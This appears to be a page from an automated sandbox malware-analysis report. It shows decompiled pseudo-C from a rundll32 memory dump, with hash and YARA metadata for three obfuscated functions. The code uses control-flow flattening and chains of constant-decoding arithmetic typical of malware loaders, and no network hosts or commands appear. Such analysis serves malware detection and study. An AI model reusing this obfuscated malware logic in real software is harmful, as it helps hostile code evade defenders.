                                                                                                                      0x0018c184
                                                                                                                      0x0018c2c4
                                                                                                                      0x0018c2cd
                                                                                                                      0x0018c2cd
                                                                                                                      0x0018c286
                                                                                                                      0x0018c28b
                                                                                                                      0x0018c28b
                                                                                                                      0x0018c28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: f101fabcd838d426c3718cda6a5ad96da99c3248bf7867b0ed0370722d375183
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: CCB142728083809FD758EFA5C58941BFBE2BBC4758F518A1DF5A596260D3B18A09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001841A7 Relevance: 2.7, Strings: 2, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001841A7() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				signed int _t227;
				intOrPtr _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				void* _t233;
				void* _t251;
				signed int* _t255;

				_t255 =  &_v100;
				_v68 = 0xec424;
				_v68 = _v68 | 0x15a76721;
				_v68 = _v68 + 0xba51;
				_v68 = _v68 ^ 0x95b0a177;
				_v32 = 0x9cb342;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0000013b;
				_v72 = 0xae6f3e;
				_v72 = _v72 >> 0xb;
				_v4 = 0;
				_v72 = _v72 * 0x1b;
				_t251 = 0x38ba83c;
				_v72 = _v72 ^ 0x000cf0a1;
				_v40 = 0xd29c0d;
				_v40 = _v40 | 0x0be9fd1c;
				_v40 = _v40 ^ 0x0bf96d7b;
				_v96 = 0x10a61a;
				_v96 = _v96 + 0x673b;
				_v96 = _v96 + 0x336d;
				_v96 = _v96 + 0x2fcb;
				_v96 = _v96 ^ 0x001323ac;
				_v100 = 0x9d3afd;
				_v100 = _v100 << 7;
				_v100 = _v100 << 5;
				_t230 = 0x55;
				_v100 = _v100 / _t230;
				_v100 = _v100 ^ 0x027b67ec;
				_v84 = 0x9cb324;
				_v84 = _v84 + 0xffffbca6;
				_v84 = _v84 + 0xd0f1;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x750d3d14;
				_v88 = 0x3cd70;
				_v88 = _v88 << 0xc;
				_v88 = _v88 + 0x865d;
				_t231 = 0x65;
				_v88 = _v88 / _t231;
				_v88 = _v88 ^ 0x009e1e24;
				_v24 = 0xf6c479;
				_v24 = _v24 ^ 0xf85d6d57;
				_v24 = _v24 ^ 0xf8a5b53e;
				_v92 = 0xa4533c;
				_v92 = _v92 << 8;
				_v92 = _v92 << 0xf;
				_v92 = _v92 ^ 0x907f3c14;
				_v92 = _v92 ^ 0x0e792839;
				_v28 = 0xd04f15;
				_v28 = _v28 * 0x53;
				_v28 = _v28 ^ 0x4380c19a;
				_v36 = 0x6fba0d;
				_v36 = _v36 * 0x6b;
				_v36 = _v36 ^ 0x2ebab037;
				_v20 = 0x23d496;
				_v20 = _v20 ^ 0x4cebd1bd;
				_v20 = _v20 ^ 0x4cc2ad40;
				_v60 = 0x3b5a6d;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x0000f98a;
				_v64 = 0xf0d036;
				_v64 = _v64 + 0xffff53b4;
				_v64 = _v64 ^ 0x894664b9;
				_v64 = _v64 ^ 0x89bf3867;
				_v48 = 0xb08deb;
				_v48 = _v48 | 0x78ca9a10;
				_v48 = _v48 + 0xffff33de;
				_v48 = _v48 ^ 0x78fbc05b;
				_v16 = 0x2da7c5;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00092ddb;
				_v52 = 0x523898;
				_t232 = 0x59;
				_t227 = _v4;
				_v52 = _v52 / _t232;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01d201e4;
				_v56 = 0x19cc06;
				_v56 = _v56 + 0xfffff128;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0x6f4387c2;
				_v76 = 0x5278ca;
				_v76 = _v76 << 9;
				_v76 = _v76 ^ 0x8826d706;
				_t233 = 0x5c;
				_v76 = _v76 * 0x5a;
				_v76 = _v76 ^ 0xc3a97567;
				_v12 = 0xdfbc19;
				_v12 = _v12 + 0xffff7584;
				_v12 = _v12 ^ 0x00deabf9;
				_v44 = 0x7b85bc;
				_v44 = _v44 * 9;
				_v44 = _v44 ^ 0xa28277a7;
				_v44 = _v44 ^ 0xa6d14151;
				_v80 = 0xd07577;
				_v80 = _v80 | 0x5043dc19;
				_v80 = _v80 * 0x49;
				_v80 = _v80 * 0x43;
				_v80 = _v80 ^ 0x4228a280;
				while(1) {
					L1:
					_t218 = 0x35852e4;
					do {
						while(_t251 != _t218) {
							if(_t251 == 0x38ba83c) {
								_t251 = 0xe9ff08f;
								continue;
							} else {
								if(_t251 == 0x83f204b) {
									E00177AF8(_v76, _v12, _v8, _v44, _v80);
								} else {
									if(_t251 == 0xe0715ba) {
										_push(_v100);
										_push(_v96);
										_t238 = _v72;
										_push(0x17118c);
										__eflags = E00178786(_v84, _v40, _v72,  &_v8, _v88, E0017AB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
										E0017AE03(_v20, _v60, _v64, _t222);
										_t255 =  &(_t255[0x12]);
										L14:
										_t218 = 0x35852e4;
										_t233 = 0x5c;
										goto L15;
									} else {
										if(_t251 != 0xe9ff08f) {
											goto L15;
										} else {
											_t228 =  *0x19520c; // 0x0
											_t229 = _t228 + 0x220;
											while( *_t229 != _t233) {
												_t229 = _t229 + 2;
												__eflags = _t229;
											}
											_t227 = _t229 + 2;
											_t251 = 0xe0715ba;
											goto L1;
										}
									}
								}
							}
							L18:
							return _v4;
						}
						_t219 = E0017EFA6(_v48, _v16, _t227, _v52, _v8, _v56);
						_t255 =  &(_t255[4]);
						__eflags = _t219;
						_t251 = 0x83f204b;
						_t196 = _t219 == 0;
						__eflags = _t196;
						_v4 = 0 | _t196;
						goto L14;
						L15:
						__eflags = _t251 - 0xdf478d7;
					} while (__eflags != 0);
					goto L18;
				}
			}







































                                                                                                                      0x001841a7
                                                                                                                      0x001841aa
                                                                                                                      0x001841b4
                                                                                                                      0x001841be
                                                                                                                      0x001841c6
                                                                                                                      0x001841ce
                                                                                                                      0x001841d6
                                                                                                                      0x001841db
                                                                                                                      0x001841e3
                                                                                                                      0x001841eb
                                                                                                                      0x001841f0
                                                                                                                      0x001841fd
                                                                                                                      0x00184201
                                                                                                                      0x00184206
                                                                                                                      0x0018420e
                                                                                                                      0x00184216
                                                                                                                      0x0018421e
                                                                                                                      0x00184226
                                                                                                                      0x0018422e
                                                                                                                      0x00184236
                                                                                                                      0x0018423e
                                                                                                                      0x00184246
                                                                                                                      0x0018424e
                                                                                                                      0x00184256
                                                                                                                      0x0018425b
                                                                                                                      0x00184266
                                                                                                                      0x0018426b
                                                                                                                      0x00184271
                                                                                                                      0x00184279
                                                                                                                      0x00184281
                                                                                                                      0x00184289
                                                                                                                      0x00184291
                                                                                                                      0x00184296
                                                                                                                      0x0018429e
                                                                                                                      0x001842a6
                                                                                                                      0x001842ab
                                                                                                                      0x001842b7
                                                                                                                      0x001842ba
                                                                                                                      0x001842be
                                                                                                                      0x001842c6
                                                                                                                      0x001842ce
                                                                                                                      0x001842d6
                                                                                                                      0x001842de
                                                                                                                      0x001842e6
                                                                                                                      0x001842eb
                                                                                                                      0x001842f0
                                                                                                                      0x001842f8
                                                                                                                      0x00184300
                                                                                                                      0x0018430d
                                                                                                                      0x00184311
                                                                                                                      0x00184319
                                                                                                                      0x00184326
                                                                                                                      0x0018432a
                                                                                                                      0x00184332
                                                                                                                      0x0018433a
                                                                                                                      0x00184342
                                                                                                                      0x0018434a
                                                                                                                      0x00184352
                                                                                                                      0x00184357
                                                                                                                      0x0018435c
                                                                                                                      0x00184364
                                                                                                                      0x0018436c
                                                                                                                      0x00184374
                                                                                                                      0x0018437c
                                                                                                                      0x00184384
                                                                                                                      0x0018438c
                                                                                                                      0x00184394
                                                                                                                      0x0018439e
                                                                                                                      0x001843ab
                                                                                                                      0x001843b3
                                                                                                                      0x001843b8
                                                                                                                      0x001843c0
                                                                                                                      0x001843ce
                                                                                                                      0x001843d1
                                                                                                                      0x001843d5
                                                                                                                      0x001843d9
                                                                                                                      0x001843de
                                                                                                                      0x001843e6
                                                                                                                      0x001843ee
                                                                                                                      0x001843f6
                                                                                                                      0x001843fb
                                                                                                                      0x00184403
                                                                                                                      0x0018440b
                                                                                                                      0x00184410
                                                                                                                      0x0018441f
                                                                                                                      0x00184420
                                                                                                                      0x00184424
                                                                                                                      0x0018442c
                                                                                                                      0x00184434
                                                                                                                      0x0018443c
                                                                                                                      0x00184444
                                                                                                                      0x00184451
                                                                                                                      0x00184455
                                                                                                                      0x0018445d
                                                                                                                      0x00184465
                                                                                                                      0x0018446d
                                                                                                                      0x0018447a
                                                                                                                      0x00184483
                                                                                                                      0x00184487
                                                                                                                      0x0018448f
                                                                                                                      0x0018448f
                                                                                                                      0x0018448f
                                                                                                                      0x00184494
                                                                                                                      0x00184494
                                                                                                                      0x001844a2
                                                                                                                      0x00184558
                                                                                                                      0x00000000
                                                                                                                      0x001844a8
                                                                                                                      0x001844ae
                                                                                                                      0x001845b9
                                                                                                                      0x001844b4
                                                                                                                      0x001844b6
                                                                                                                      0x001844e1
                                                                                                                      0x001844e5
                                                                                                                      0x001844ed
                                                                                                                      0x001844f1
                                                                                                                      0x0018452f
                                                                                                                      0x0018454b
                                                                                                                      0x0018454e
                                                                                                                      0x00184553
                                                                                                                      0x0018458f
                                                                                                                      0x00184591
                                                                                                                      0x00184596
                                                                                                                      0x00000000
                                                                                                                      0x001844b8
                                                                                                                      0x001844be
                                                                                                                      0x00000000
                                                                                                                      0x001844c4
                                                                                                                      0x001844c4
                                                                                                                      0x001844ca
                                                                                                                      0x001844d5
                                                                                                                      0x001844d2
                                                                                                                      0x001844d2
                                                                                                                      0x001844d2
                                                                                                                      0x001844da
                                                                                                                      0x001844dd
                                                                                                                      0x00000000
                                                                                                                      0x001844dd
                                                                                                                      0x001844be
                                                                                                                      0x001844b6
                                                                                                                      0x001844ae
                                                                                                                      0x001845c1
                                                                                                                      0x001845cc
                                                                                                                      0x001845cc
                                                                                                                      0x00184577
                                                                                                                      0x0018457e
                                                                                                                      0x00184581
                                                                                                                      0x00184583
                                                                                                                      0x00184588
                                                                                                                      0x00184588
                                                                                                                      0x0018458b
                                                                                                                      0x00000000
                                                                                                                      0x00184597
                                                                                                                      0x00184597
                                                                                                                      0x00184597
                                                                                                                      0x00000000
                                                                                                                      0x001845a3

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: 7c4ba60056714568650a74965943749207a681d58a9f496574325dace34f4a12
                                                                                                                      • Instruction ID: 869803f060482af5eba4d0b4814a95b96a93ff35a15ee4fa87aaeddf8a69e9d6
                                                                                                                      • Opcode Fuzzy Hash: 7c4ba60056714568650a74965943749207a681d58a9f496574325dace34f4a12
                                                                                                                      • Instruction Fuzzy Hash: 62A120B25093819BC358CF25D98A41FBBF1BBD8748F104A1DF29A96260D7B1CA09CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018FF31 Relevance: 2.7, Strings: 2, Instructions: 176COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018FF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				void* _t147;
				intOrPtr _t161;
				signed int _t169;
				void* _t172;
				void* _t188;
				intOrPtr* _t189;
				void* _t191;
				void* _t192;

				_push(_a12);
				_t188 = __edx;
				_t189 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t147);
				_v60 = 0xe50c8f;
				_v56 = 0;
				_t192 = _t191 + 0x14;
				_v52 = 0;
				_v76 = 0x2f3c66;
				_t172 = 0x80c5f05;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00179e33;
				_v100 = 0xdfcc0f;
				_v100 = _v100 + 0x5dbe;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x00087c2f;
				_v112 = 0xadc62;
				_v112 = _v112 | 0x1372df76;
				_v112 = _v112 >> 7;
				_v112 = _v112 ^ 0x002d2981;
				_v116 = 0xfe909d;
				_v116 = _v116 << 7;
				_t169 = 0x44;
				_v116 = _v116 / _t169;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x0009e39a;
				_v120 = 0xded18e;
				_v120 = _v120 + 0xffff5063;
				_v120 = _v120 ^ 0xd3175283;
				_v120 = _v120 * 0x6d;
				_v120 = _v120 ^ 0x2cc94156;
				_v124 = 0xc7fb01;
				_v124 = _v124 + 0xffff9b92;
				_v124 = _v124 | 0x8f919799;
				_v124 = _v124 + 0xaff8;
				_v124 = _v124 ^ 0x8fd45f25;
				_v68 = 0xadf2f0;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x056cc5e6;
				_v72 = 0x9db552;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x276b9b1e;
				_v64 = 0x9edb03;
				_v64 = _v64 ^ 0x7ad40136;
				_v64 = _v64 ^ 0x7a416b45;
				_v96 = 0x899086;
				_v96 = _v96 + 0x3abe;
				_v96 = _v96 + 0xffff9b83;
				_v96 = _v96 ^ 0x008dc818;
				_v80 = 0x1613a8;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000fe8a1;
				_v84 = 0xc2e1e1;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0c264902;
				_v104 = 0x78369d;
				_v104 = _v104 ^ 0x8f03ebf2;
				_v104 = _v104 * 0x5b;
				_v104 = _v104 ^ 0x010dd9c3;
				_v88 = 0x6e061c;
				_v88 = _v88 * 0x7f;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x00d4f969;
				_v92 = 0x56c027;
				_v92 = _v92 ^ 0x48eed99d;
				_v92 = _v92 + 0xffff6999;
				_v92 = _v92 ^ 0x48bab2c5;
				_v108 = 0xffa91b;
				_v108 = _v108 * 0x23;
				_v108 = _v108 | 0x4c85b786;
				_v108 = _v108 * 0x3a;
				_v108 = _v108 ^ 0x23a92266;
				do {
					while(_t172 != 0xd9dda6) {
						if(_t172 == 0x1ff9304) {
							E00184D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
							_t192 = _t192 + 8;
							_t172 = 0xcf0dfe0;
							continue;
						} else {
							if(_t172 == 0x2f8759c) {
								_push(_t172);
								_push(_t172);
								_t161 = E00183512( *(_t189 + 4));
								 *_t189 = _t161;
								__eflags = _t161;
								if(__eflags != 0) {
									_t172 = 0x3d5ab39;
									continue;
								}
							} else {
								if(_t172 == 0x3d5ab39) {
									E001864C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
									_t192 = _t192 + 0x10;
									_t172 = 0x1ff9304;
									continue;
								} else {
									if(_t172 == 0x80c5f05) {
										_t172 = 0xd9dda6;
										 *_t189 = 0;
										 *(_t189 + 4) = _v76;
										continue;
									} else {
										if(_t172 == 0xcf0dfe0) {
											E0018F88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
											_t192 = _t192 + 0xc;
											_t172 = 0xfec6e86;
											continue;
										} else {
											_t201 = _t172 - 0xfec6e86;
											if(_t172 != 0xfec6e86) {
												goto L17;
											} else {
												E0018F88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t189 != 0x00000000;
					}
					 *(_t189 + 4) = E0018542E(_t188);
					_t172 = 0x2f8759c;
					L17:
					__eflags = _t172 - 0x1551776;
				} while (__eflags != 0);
				goto L9;
			}































                                                                                                                      0x0018ff3b
                                                                                                                      0x0018ff42
                                                                                                                      0x0018ff44
                                                                                                                      0x0018ff46
                                                                                                                      0x0018ff4d
                                                                                                                      0x0018ff54
                                                                                                                      0x0018ff55
                                                                                                                      0x0018ff56
                                                                                                                      0x0018ff5b
                                                                                                                      0x0018ff65
                                                                                                                      0x0018ff69
                                                                                                                      0x0018ff6c
                                                                                                                      0x0018ff72
                                                                                                                      0x0018ff7a
                                                                                                                      0x0018ff7f
                                                                                                                      0x0018ff83
                                                                                                                      0x0018ff8b
                                                                                                                      0x0018ff93
                                                                                                                      0x0018ff9b
                                                                                                                      0x0018ffa0
                                                                                                                      0x0018ffa8
                                                                                                                      0x0018ffb0
                                                                                                                      0x0018ffb8
                                                                                                                      0x0018ffbd
                                                                                                                      0x0018ffc5
                                                                                                                      0x0018ffcd
                                                                                                                      0x0018ffd8
                                                                                                                      0x0018ffdb
                                                                                                                      0x0018ffdf
                                                                                                                      0x0018ffe4
                                                                                                                      0x0018ffec
                                                                                                                      0x0018fff4
                                                                                                                      0x0018fffc
                                                                                                                      0x00190009
                                                                                                                      0x0019000d
                                                                                                                      0x00190015
                                                                                                                      0x0019001d
                                                                                                                      0x00190025
                                                                                                                      0x0019002d
                                                                                                                      0x00190035
                                                                                                                      0x0019003d
                                                                                                                      0x00190045
                                                                                                                      0x0019004a
                                                                                                                      0x00190052
                                                                                                                      0x0019005a
                                                                                                                      0x0019005f
                                                                                                                      0x00190067
                                                                                                                      0x0019006f
                                                                                                                      0x00190077
                                                                                                                      0x0019007f
                                                                                                                      0x00190087
                                                                                                                      0x0019008f
                                                                                                                      0x00190097
                                                                                                                      0x0019009f
                                                                                                                      0x001900a7
                                                                                                                      0x001900ac
                                                                                                                      0x001900b4
                                                                                                                      0x001900bc
                                                                                                                      0x001900c1
                                                                                                                      0x001900c9
                                                                                                                      0x001900d1
                                                                                                                      0x001900de
                                                                                                                      0x001900e2
                                                                                                                      0x001900ea
                                                                                                                      0x001900f7
                                                                                                                      0x001900fb
                                                                                                                      0x00190100
                                                                                                                      0x00190108
                                                                                                                      0x00190110
                                                                                                                      0x00190118
                                                                                                                      0x00190125
                                                                                                                      0x0019012d
                                                                                                                      0x0019013a
                                                                                                                      0x0019013e
                                                                                                                      0x0019014b
                                                                                                                      0x0019014f
                                                                                                                      0x00190157
                                                                                                                      0x00190157
                                                                                                                      0x00190169
                                                                                                                      0x00190264
                                                                                                                      0x00190269
                                                                                                                      0x0019026c
                                                                                                                      0x00000000
                                                                                                                      0x0019016f
                                                                                                                      0x00190175
                                                                                                                      0x00190238
                                                                                                                      0x00190239
                                                                                                                      0x0019023d
                                                                                                                      0x00190242
                                                                                                                      0x00190246
                                                                                                                      0x00190248
                                                                                                                      0x0019024e
                                                                                                                      0x00000000
                                                                                                                      0x0019024e
                                                                                                                      0x0019017b
                                                                                                                      0x0019017d
                                                                                                                      0x0019021a
                                                                                                                      0x0019021f
                                                                                                                      0x00190222
                                                                                                                      0x00000000
                                                                                                                      0x00190183
                                                                                                                      0x00190189
                                                                                                                      0x001901f5
                                                                                                                      0x001901fa
                                                                                                                      0x001901fc
                                                                                                                      0x00000000
                                                                                                                      0x0019018b
                                                                                                                      0x00190191
                                                                                                                      0x001901df
                                                                                                                      0x001901e4
                                                                                                                      0x001901e7
                                                                                                                      0x00000000
                                                                                                                      0x00190193
                                                                                                                      0x00190193
                                                                                                                      0x00190199
                                                                                                                      0x00000000
                                                                                                                      0x0019019f
                                                                                                                      0x001901b2
                                                                                                                      0x001901b7
                                                                                                                      0x00190199
                                                                                                                      0x00190191
                                                                                                                      0x00190189
                                                                                                                      0x0019017d
                                                                                                                      0x00190175
                                                                                                                      0x001901bb
                                                                                                                      0x001901cb
                                                                                                                      0x001901cb
                                                                                                                      0x0019027d
                                                                                                                      0x00190280
                                                                                                                      0x00190285
                                                                                                                      0x00190285
                                                                                                                      0x00190285
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 6105c40eceee27cb0e2b193849d71cc70378b4a88d21a3d500570b0438e35f46
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: 1C8132710083419FC769DF25C98A42BFBF1FBD8748F544A2DF29A86260D7B19A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018C9A9 Relevance: 2.7, Strings: 2, Instructions: 163COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0018C9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t147;
				void* _t168;
				void* _t171;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0017CF25(_t147);
				_v60 = 0x2183dd;
				_t195 =  &(( &_v64)[6]);
				_v60 = _v60 << 0xc;
				_v60 = _v60 << 0xf;
				_t192 = 0;
				_t171 = 0xa488efe;
				_t188 = 0x78;
				_v60 = _v60 * 0xa;
				_v60 = _v60 ^ 0x10000001;
				_v44 = 0xe22f1a;
				_v44 = _v44 + 0xffffab53;
				_v44 = _v44 / _t188;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x00003c3b;
				_v36 = 0x9a4ce6;
				_v36 = _v36 + 0xffffe16e;
				_v36 = _v36 | 0x72a3b0b5;
				_v36 = _v36 ^ 0x32bbbef5;
				_v28 = 0xd892e4;
				_v28 = _v28 | 0x189bde37;
				_v28 = _v28 ^ 0x998d043c;
				_v28 = _v28 ^ 0xc156dacb;
				_v20 = 0xff0234;
				_v20 = _v20 + 0xffffad5b;
				_v20 = _v20 ^ 0x00f1fad0;
				_v40 = 0xdc05b;
				_v40 = _v40 ^ 0xb55e20f9;
				_t189 = 3;
				_v40 = _v40 / _t189;
				_v40 = _v40 ^ 0x3c7a3b1c;
				_v64 = 0x518ad0;
				_v64 = _v64 ^ 0x6bfb13ad;
				_v64 = _v64 << 2;
				_t190 = 0x6a;
				_v64 = _v64 * 7;
				_v64 = _v64 ^ 0xc6a3f60b;
				_v24 = 0x25f852;
				_v24 = _v24 + 0xffff91c6;
				_v24 = _v24 ^ 0x002d038f;
				_v32 = 0x681d6c;
				_v32 = _v32 ^ 0x9f49642f;
				_v32 = _v32 * 0x3a;
				_v32 = _v32 ^ 0x0d93f477;
				_v56 = 0xa4373;
				_v56 = _v56 >> 9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 << 9;
				_v56 = _v56 ^ 0x521bad52;
				_v16 = 0x3abafe;
				_v16 = _v16 | 0x2531d7a0;
				_v16 = _v16 ^ 0x25301684;
				_v48 = 0x8b99e8;
				_v48 = _v48 ^ 0x8a9a3b2d;
				_v48 = _v48 * 0x56;
				_v48 = _v48 / _t190;
				_v48 = _v48 ^ 0x00e0af40;
				_v8 = 0xf2305e;
				_v8 = _v8 | 0x3a3bb36f;
				_v8 = _v8 ^ 0x3af325a3;
				_v52 = 0xa4558c;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xad08;
				_v52 = _v52 ^ 0x0057bd84;
				_v12 = 0xb8a572;
				_v12 = _v12 | 0x00b7603c;
				_v12 = _v12 ^ 0x00ba29b3;
				while(_t171 != 0x263a30c) {
					if(_t171 == 0x50e379a) {
						_push(_t171);
						_push(_t171);
						_t192 = E00183512(_v4 + _v4);
						if(_t192 != 0) {
							_t171 = 0x263a30c;
							continue;
						}
					} else {
						if(_t171 == 0xa488efe) {
							_t171 = 0xdc1694f;
							continue;
						} else {
							if(_t171 != 0xdc1694f) {
								L11:
								if(_t171 != 0xa17b831) {
									continue;
								}
							} else {
								_t168 = E0018D2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
								_t195 =  &(_t195[7]);
								if(_t168 != 0) {
									_t171 = 0x50e379a;
									continue;
								}
							}
						}
					}
					return _t192;
				}
				E0018D2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
				_t195 =  &(_t195[7]);
				_t171 = 0xa17b831;
				goto L11;
			}




























                                                                                                                      0x0018c9b0
                                                                                                                      0x0018c9b4
                                                                                                                      0x0018c9b8
                                                                                                                      0x0018c9bc
                                                                                                                      0x0018c9c0
                                                                                                                      0x0018c9c2
                                                                                                                      0x0018c9c7
                                                                                                                      0x0018c9cf
                                                                                                                      0x0018c9d2
                                                                                                                      0x0018c9d9
                                                                                                                      0x0018c9de
                                                                                                                      0x0018c9e5
                                                                                                                      0x0018c9ec
                                                                                                                      0x0018c9ef
                                                                                                                      0x0018c9f3
                                                                                                                      0x0018c9fb
                                                                                                                      0x0018ca03
                                                                                                                      0x0018ca13
                                                                                                                      0x0018ca17
                                                                                                                      0x0018ca1c
                                                                                                                      0x0018ca24
                                                                                                                      0x0018ca2c
                                                                                                                      0x0018ca34
                                                                                                                      0x0018ca3c
                                                                                                                      0x0018ca44
                                                                                                                      0x0018ca4c
                                                                                                                      0x0018ca54
                                                                                                                      0x0018ca5c
                                                                                                                      0x0018ca64
                                                                                                                      0x0018ca6c
                                                                                                                      0x0018ca74
                                                                                                                      0x0018ca7c
                                                                                                                      0x0018ca84
                                                                                                                      0x0018ca90
                                                                                                                      0x0018ca95
                                                                                                                      0x0018ca9b
                                                                                                                      0x0018caa3
                                                                                                                      0x0018caab
                                                                                                                      0x0018cab3
                                                                                                                      0x0018cabd
                                                                                                                      0x0018cabe
                                                                                                                      0x0018cac2
                                                                                                                      0x0018caca
                                                                                                                      0x0018cad2
                                                                                                                      0x0018cada
                                                                                                                      0x0018cae2
                                                                                                                      0x0018caea
                                                                                                                      0x0018caf7
                                                                                                                      0x0018cafb
                                                                                                                      0x0018cb03
                                                                                                                      0x0018cb0b
                                                                                                                      0x0018cb10
                                                                                                                      0x0018cb15
                                                                                                                      0x0018cb1a
                                                                                                                      0x0018cb22
                                                                                                                      0x0018cb2a
                                                                                                                      0x0018cb32
                                                                                                                      0x0018cb3a
                                                                                                                      0x0018cb42
